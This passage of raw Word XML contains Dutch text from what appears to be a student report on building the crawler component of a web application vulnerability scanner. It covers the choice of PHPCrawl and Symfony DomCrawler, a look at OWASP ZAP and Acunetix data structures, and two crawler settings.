        <w:t>ls in een database of in c</w:t>
      </w:r>
      <w:r w:rsidR="0097428C">
        <w:t>ache</w:t>
      </w:r>
      <w:r w:rsidR="00C1233D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0097428C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0032735F">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00C1233D">
        <w:t>it maakt het</w:t>
      </w:r>
      <w:r w:rsidR="0032735F">
        <w:t xml:space="preserve"> duidelijk dat een simpele </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0032735F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0032735F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0032735F">
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0032735F">
        <w:t>, wat een HTTP response terug geeft</w:t>
      </w:r>
      <w:r w:rsidR="0099717E">
        <w:t>, niet genuanceerd genoeg is om mee te werken</w:t>
      </w:r>
      <w:r w:rsidR="0032735F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0097428C">
        <w:t xml:space="preserve"> Om de introductie tot de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0097428C">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0097428C">
        <w:t xml:space="preserve"> samen te vatten, de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0097428C">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0097428C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C7D6F">
        <w:t>springt</w:t>
      </w:r>
      <w:r w:rsidR="0097428C">
        <w:t xml:space="preserve"> van webpagina naar webpagina binnen de scope van de website, op zoek naar URL’s die het opslaat in een</w:t>
      </w:r>
      <w:r w:rsidR="0091238E">
        <w:t xml:space="preserve"> datastructuur van een</w:t>
      </w:r>
      <w:r w:rsidR="0097428C">
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
      <w:r w:rsidR="0091238E">
        <w:t xml:space="preserve"> of cache oplossing. </w:t>
      </w:r>
      <w:r w:rsidR="00410161">
        <w:t xml:space="preserve">Dit is een voorbeeld van een simpele </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00410161">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00410161">
        <w:t xml:space="preserve">. In de volgende deel zal ik specifiek zijn over wat voor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00410161">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00410161">
        <w:t xml:space="preserve"> ik ga bouwen voor de </w:t>
      </w:r>
      <w:r w:rsidR="00426958">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00410161">
        <w:t xml:space="preserve"> scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0967EC" w14:textId="484F0F28" w:rsidR="00E3339F" w:rsidRDefault="00E3339F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B6072C" w14:textId="08B035B7" w:rsidR="00FF36DC" w:rsidRPr="0003032B" w:rsidRDefault="00F535AC" w:rsidP="005A5059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003032B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Concept </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0003032B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39E29923" w14:textId="0BEC797A" w:rsidR="004D1CEC" w:rsidRPr="004D1CEC" w:rsidRDefault="0096594D" w:rsidP="005A5059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Met de introductie wou ik als doel hebben om de lezer te informeren over wat een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is en wat de werkzaamheden zijn </w:t>
      </w:r>
      <w:r w:rsidR="00426958">
        <w:t>ervan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B9289A">
        <w:t xml:space="preserve">In dit deel zal ik uitgebreid behandelen hoe, de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B9289A">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B9289A">
        <w:t xml:space="preserve"> die ik ga im</w:t>
      </w:r>
      <w:r w:rsidR="00446B11">
        <w:t>plementeren</w:t>
      </w:r>
      <w:r w:rsidR="003B14DE">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00446B11">
        <w:t xml:space="preserve"> in zijn werking gaat. </w:t>
      </w:r>
      <w:r w:rsidR="003D713E">
        <w:t xml:space="preserve">Het doel van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D713E">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F762CE">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003D713E">
        <w:t xml:space="preserve"> zoals eerder vermeld is het verzamelen van informatie dat zich bevindt op een website, in het specifiek URL’</w:t>
      </w:r>
      <w:r w:rsidR="003B14DE">
        <w:t xml:space="preserve">s. </w:t>
      </w:r>
      <w:r w:rsidR="00A022E0">
        <w:t>URL’s worden gebruikten in een latere stadia, bij de uitvoering van gesimuleerde aanvallen.</w:t>
      </w:r>
      <w:r w:rsidR="004D1CEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71490A73" w14:textId="49DF1A90" w:rsidR="00163736" w:rsidRDefault="00B47A5A" w:rsidP="005A5059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ik zal de kern van het systeem in de PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ontwikkelen, deze maakt gebruik van een package manager Composer</w:t>
      </w:r>
      <w:r w:rsidR="001F4D1C">
        <w:t xml:space="preserve">, dat </w:t>
      </w:r>
      <w:r w:rsidR="00426958">
        <w:t>ontwikkeld</w:t>
      </w:r>
      <w:r w:rsidR="001F4D1C">
        <w:t xml:space="preserve"> is door </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F4D1C">
        <w:t>Symfony</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F4D1C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D050FA">
        <w:t xml:space="preserve"> Waarom is dit belangrijk? Package managers geven ontwikkelaars de mogelijkheid om programmeer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D050FA">
        <w:t>libraries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D050FA">
        <w:t xml:space="preserve"> te installeren in hen projecten. </w:t>
      </w:r>
      <w:r w:rsidR="001E127C">
        <w:t xml:space="preserve">Twee hiervan gebruik ik voor het ontwikkelen van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E127C">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E127C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332AFCF7" w14:textId="77777777" w:rsidR="008A24DA" w:rsidRDefault="001771F1" w:rsidP="005A5059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ik heb een eerdere versie van een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zelf proberen te schrijven maar daar was ik niet in geslaagd. Het was beperkt in het verwerken van meta data, dus in dit geval informatie over de gevonden links. Ook kon het maar één pagina crawlen per crawl proces. Deze versie zal ik aan de bijlage van dit document toe</w:t>
      </w:r>
      <w:r w:rsidR="00905174">
        <w:t>voegen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AB9126" w14:textId="4BBCA72B" w:rsidR="00725EA2" w:rsidRDefault="00F57BDD" w:rsidP="00017FC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na zelf een poging gewaagd te hebben tot het schrijven van een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, heb ik besloten om bestaande Crawl </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libraries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001256EE">
        <w:t xml:space="preserve"> (Glossary, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001256EE">
        <w:t>library</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001256EE">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te gebruiken</w:t>
      </w:r>
      <w:r w:rsidR="001256EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C37299">
        <w:t xml:space="preserve">voor het ontwikkelen van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C37299">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C37299">
        <w:t xml:space="preserve">. Dit 1) </w:t>
      </w:r>
      <w:r w:rsidR="00CE0156">
        <w:t>versnelt</w:t>
      </w:r>
      <w:r w:rsidR="00C37299">
        <w:t xml:space="preserve"> het </w:t>
      </w:r>
      <w:r w:rsidR="005A60E1">
        <w:t>ontwikkelproces</w:t>
      </w:r>
      <w:r w:rsidR="00C37299">
        <w:t xml:space="preserve"> en 2) geeft mij toegang tot een </w:t>
      </w:r>
      <w:r w:rsidR="00426958">
        <w:t>groot</w:t>
      </w:r>
      <w:r w:rsidR="00C37299">
        <w:t xml:space="preserve"> aantal nuttige functie</w:t>
      </w:r>
      <w:r w:rsidR="001256EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00850C67">
        <w:t>en configuraties.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D32A1">
        <w:t xml:space="preserve">De twee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D32A1">
        <w:t>libraries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D32A1">
        <w:t xml:space="preserve"> die ik heb gebruikt voor het ontwikkelen van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D32A1">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D32A1">
        <w:t xml:space="preserve"> zijn: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D32A1">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D32A1">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D32A1">
        <w:t>Symfony’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D32A1">
        <w:t xml:space="preserve"> eigen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D32A1">
        <w:t>DomCrawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D32A1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E0626A">
        <w:t xml:space="preserve">Dit zijn twee zeer uitgebreide </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E0626A">
        <w:t>Crawlers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E0626A">
        <w:t xml:space="preserve"> die elkaar goed aanvullen bij tekortkomingen.</w:t>
      </w:r>
      <w:r w:rsidR="006E026A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D6122F">
        <w:t xml:space="preserve">Zowel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D6122F">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D6122F">
        <w:t xml:space="preserve"> en de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D6122F">
        <w:t>DomCrawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D6122F">
        <w:t xml:space="preserve"> hebben </w:t>
      </w:r>
      <w:r w:rsidR="00EE1BF8">
        <w:t>online documentatie staan waarin de functies van hen API worden behandeld</w:t>
      </w:r>
      <w:r w:rsidR="00917367">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00917367">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00917367">
        <w:t>), (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00917367">
        <w:t>DomCrawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00917367">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00EE1BF8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00917367">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC4E29">
        <w:t xml:space="preserve">Na het bestuderen van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC4E29">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC4E29">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC4E29">
        <w:t>library</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC4E29">
        <w:t xml:space="preserve"> kwam ik er snel achter dat een aantal functionaliteiten niet mogelijk waren. Zoals het verzamelen van formulier parameters en het verzenden ervan.</w:t>
      </w:r>
      <w:r w:rsidR="00EB0BE9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00136CDD">
        <w:t xml:space="preserve">Dit is de reden dat ik de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00136CDD">
        <w:t>DomCrawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00136CDD">
        <w:t xml:space="preserve"> heb gekozen om de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00136CDD">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00136CDD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00136CDD">
        <w:t>library</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00136CDD">
        <w:t xml:space="preserve"> te ondersteunen in het Crawlen van een website.</w:t>
      </w:r>
      <w:r w:rsidR="00144B73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00144B73">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00144B73">
        <w:t xml:space="preserve"> is voor het verzamelen van URL’s en de meta data ervan zeer geschikt.</w:t>
      </w:r>
      <w:r w:rsidR="00DB7281">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00725EA2">
        <w:t xml:space="preserve">Uiteindelijk draait het allemaal om het verzamelen van data, dus ik zal in </w:t>
      </w:r>
      <w:r w:rsidR="00DB7281">
        <w:t>de komende paragrafen</w:t>
      </w:r>
      <w:r w:rsidR="00725EA2">
        <w:t xml:space="preserve"> het daarover hebben.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299E4830" w14:textId="6A3FAEB7" w:rsidR="00444F71" w:rsidRDefault="006B5492" w:rsidP="00017FC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5492">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Datastructuur van </w:t>
      </w:r>
      <w:r w:rsidR="00444F71" w:rsidRPr="006B5492">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP ZAP en</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5492">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B5492">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00444F71" w:rsidRPr="006B5492">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3694807C" w14:textId="77777777" w:rsidR="00477720" w:rsidRDefault="00861E36" w:rsidP="00017FC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Uit</w:t>
      </w:r>
      <w:r w:rsidR="00195A8E">
        <w:t xml:space="preserve"> het onderzoek dat ik had gedaan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over twee </w:t>
      </w:r>
      <w:r w:rsidR="005A60E1">
        <w:t>DAST-tools</w:t>
      </w:r>
      <w:r w:rsidR="00195A8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005812EB">
        <w:t>heb ik aantal bevindingen gedaan (</w:t>
      </w:r>
      <w:r w:rsidR="00110C82">
        <w:t>Onderzoek, 3.3</w:t>
      </w:r>
      <w:r w:rsidR="005812EB">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CE65D0">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0021333F">
        <w:t xml:space="preserve">Ik heb de datastructuren bestudeert om inzicht te krijgen in van welke soort data zij gebruik maken. </w:t>
      </w:r>
      <w:r w:rsidR="005E398A">
        <w:t xml:space="preserve">Deze inzichten heb ik gebruikt om te bepalen wat essentieel is voor het de werking van een </w:t>
      </w:r>
      <w:r w:rsidR="005A60E1">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="005E398A">
        <w:t xml:space="preserve"> scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE245B" w14:textId="77777777" w:rsidR="00347F80" w:rsidRPr="00113E67" w:rsidRDefault="00347F80" w:rsidP="00017FC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00113E67">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Configuratie van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00113E67">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="458432EA" w14:textId="72090E63" w:rsidR="00D22738" w:rsidRDefault="00195A8E" w:rsidP="00017FC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC7E02">
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="004E17DC">
        <w:t>Crawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E17DC">
        <w:t xml:space="preserve"> heeft een aantal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E17DC">
        <w:t>configurabele</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E17DC">
        <w:t xml:space="preserve"> opties </w:t>
      </w:r>
      <w:r w:rsidR="00484266">
        <w:t xml:space="preserve">waarvan er twee interessant zijn voor het </w:t>
      </w:r>
      <w:r w:rsidR="009032D6">
        <w:t xml:space="preserve">Crawlen van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009032D6">
        <w:t>web applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009032D6">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778630BF" w14:textId="00CA34CA" w:rsidR="009032D6" w:rsidRDefault="004212AC" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>setFollowMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – deze instelling heeft vier opties genummerd van 0 tot 4</w:t>
      </w:r>
      <w:r w:rsidR="00A94988">
        <w:t xml:space="preserve"> het heeft betrekking op welke domeinen er worden gecrawld. </w:t>
      </w:r>
      <w:r w:rsidR="003579B3">
        <w:t>Om een voorbeeld te geven: de</w:t>
      </w:r>
      <w:r w:rsidR="000409A3">
        <w:t xml:space="preserve"> instelling </w:t>
      </w:r>
      <w:r w:rsidR="000409A3" w:rsidRPr="000409A3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="000409A3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB32AF">
        <w:t>zal alle links crawlen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05410AA1" w14:textId="048E4ED4" w:rsidR="004212AC" w:rsidRPr="006B5492" w:rsidRDefault="004212AC" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>obeyRobotsTxt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="008265FD">
        <w:t>instelling voor het volgen van de robot.txt of niet. Twee opties 0 of 1</w:t>
      </w:r>
      <w:r w:rsidR="0054787F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708716E0" w14:textId="5270F2AF" w:rsidR="000D011C" w:rsidRDefault="00471474" w:rsidP="00FB0DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00471474">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Crawlen naar data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C8E64" w14:textId="411D55D9" w:rsidR="00B425AD" w:rsidRDefault="002043AA" w:rsidP="00017FC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Het verzamelen van data is het primaire doel van een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maar de vraag luidt: wat voor data? </w:t>
      </w:r>
      <w:r w:rsidR="00FB0A4E">
        <w:t xml:space="preserve"> In de context van dit project is het belangrijk dat er zo veel mogelijk nuttige data wordt verzameld.</w:t>
      </w:r>
      <w:r w:rsidR="00E74A1A">
        <w:t xml:space="preserve"> Ik gebruik twee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E74A1A">
        <w:t>Crawlers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E74A1A">
        <w:t xml:space="preserve"> die ieder ander soort data verzameld, ik zal in dit deel uitlijnen welke dat zijn. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E74A1A">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E74A1A">
        <w:t xml:space="preserve"> is in de context van de </w:t>
      </w:r>
      <w:r w:rsidR="005A60E1">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00E74A1A">
        <w:t xml:space="preserve"> scanner de hoofd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E74A1A">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E74A1A">
        <w:t xml:space="preserve"> van website gerelateerde data.</w:t>
      </w:r>
      <w:r w:rsidR="00573796">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00573796">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00573796">
        <w:t xml:space="preserve"> heeft een simpele interface</w:t>
      </w:r>
      <w:r w:rsidR="00B425AD">
        <w:t xml:space="preserve"> waarmee er met het gebruik van een aantal functies veel data kan worden opgehaald</w:t>
      </w:r>
      <w:r w:rsidR="00573796">
        <w:t xml:space="preserve"> (Glossary, Interface)</w:t>
      </w:r>
      <w:r w:rsidR="00B425AD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00216179">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D862626" w14:textId="77777777" w:rsidR="009B306D" w:rsidRPr="00ED79DE" w:rsidRDefault="009B306D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED79DE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
